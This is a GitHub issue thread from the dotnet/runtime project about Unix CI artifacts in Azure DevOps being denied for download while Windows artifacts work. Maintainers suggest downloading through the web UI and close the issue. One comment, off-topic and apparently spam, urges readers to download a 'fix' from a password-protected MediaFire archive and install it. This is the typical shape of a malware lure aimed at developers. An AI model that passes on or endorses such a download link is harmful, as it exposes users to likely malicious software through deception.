### ISSUE TITLE
Unix CI assets are not downloadable; unlike Windows

### ISSUE THREAD

**Issue by am11** [dotnet/runtime#107019]
e.g. windows-x64: https://dev.azure.com/dnceng-public/public/_build/results?buildId=788469&view=logs&jobId=904dec8a-a560-5b3c-34ba-e48a636ec9fc&j=0b2f91e0-e9b9-5995-d2e6-c547ad90c405&t=a2b5e8a9-3564-5a98-83c0-cc6b995e15d6 has:

```
Downloading artifact Release_CoreCLR_windows_x64_Release from: https://dev.azure.com/dnceng-public//cbb18261-c48f-4abb-8651-8cdcb5474649/_apis/build/builds/788469/artifacts?artifactName=Release_CoreCLR_windows_x64_Release&$format=zip
```

which we can download and investigate/consume locally to build the next steps.

but osx-arm64: https://dev.azure.com/dnceng-public/public/_build/results?buildId=788469&view=logs&jobId=904dec8a-a560-5b3c-34ba-e48a636ec9fc&j=904dec8a-a560-5b3c-34ba-e48a636ec9fc&t=018db854-fefb-5222-3d8d-2036f59631b9 has:

```
Downloading artifact Release_CoreCLR_osx_arm64_Release from: https://dev.azure.com/dnceng-public//_apis/resources/Containers/42407846?itemPath=Release_CoreCLR_osx_arm64_Release&isShallow=true&api-version=4.1-preview.4
```

which denies the request:
<img width="1380" alt="image" src="https://github.com/user-attachments/assets/a12494e7-05f4-497c-947a-de931aac2bec">

It would be nice to not restrict access, at least not due to platform bias.

cc @akoeplinger, @mmitche

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by akoeplinger** [comment]
That's pretty weird and likely some AzDO issue since we don't configure access at the artifacts level.

Can you try going to https://dev.azure.com/dnceng-public/public/_build/results?buildId=788469&view=artifacts&pathAsName=false&type=publishedArtifacts and downloading `Release_CoreCLR_osx_arm64_Release` from the UI using the dropdown
<img width="713" alt="image" src="https://github.com/user-attachments/assets/eea306ff-4c66-4c35-bf9b-3abd8f4d197d">

**Comment by akoeplinger** [comment]
Closing for now hoping this was fixed by AzDO in the meantime.

**Comment by am11** [comment]
Thanks. We can download it from the release artifacts. The URL showing in "Downloading from: https://dev.azure.com/dnceng-public//_apis/resources/Containers/44340473?itemPath=CoreCLR_ReleaseLibraries_TestArtifacts_linux_x64_Checked&isShallow=true&api-version=4.1-preview.4" requires some SAS token or some such.
